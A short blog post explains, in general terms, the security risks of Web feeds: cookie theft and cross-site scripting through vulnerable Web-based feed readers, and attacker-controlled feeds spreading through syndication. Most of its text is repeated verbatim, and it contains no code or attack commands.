Web Reader Risks
People typically use browsers or local clients to subscribe to a Web-based
feed. They are affected by both local and remote zone issues depending on
the application's implementation. Online sites such as bloglines.com or
Google provide Web-based feed viewers and fall into the remote zone risk
category. Vulnerabilities in Web-based viewers grant attackers access to the
site's zone (allowing cookie theft) and to common abilities often available for
Cross-Site Scripting attacks.
Web Site Risks
The potential impact of a feed-based attack increases significantly when the
feed being controlled is syndicated on other Web sites. For example, if an
attacker-controlled feed was created on Site A and implemented on Site B,
its content would be included in Site B's content. If Site B were also
vulnerable to a Web feed attack, the attacker could then access Site B's
remote zone and users. In some cases an attacker-controlled feed is included
in feeds to other sites and also to users who in turn pass it elsewhere, rapidly
expanding the base of possible victims.
People typically use browsers or local clients to subscribe to a Web-based
feed. They are affected by both local and remote zone issues depending on
the application's implementation. Online sites such as bloglines.com or
Google provide Web-based feed viewers and fall into the remote zone risk
category. Vulnerabilities in Web-based viewers grant attackers access to the
site's zone (allowing cookie theft) and to common abilities often available for
Cross-Site Scripting attacks.
Web Site Risks
The potential impact of a feed-based attack increases significantly when the
feed being controlled is syndicated on other Web sites. For example, if an
attacker-controlled feed was created on Site A and implemented on Site B,
its content would be included in Site B's content. If Site B were also
vulnerable to a Web feed attack, the attacker could then access Site B's
remote zone and users. In some cases an attacker-controlled feed is included
in feeds to other sites and also to users who in turn pass it elsewhere, rapidly
expanding the base of possible victims.
Powered by ScribeFire.
0 comments:
Post a Comment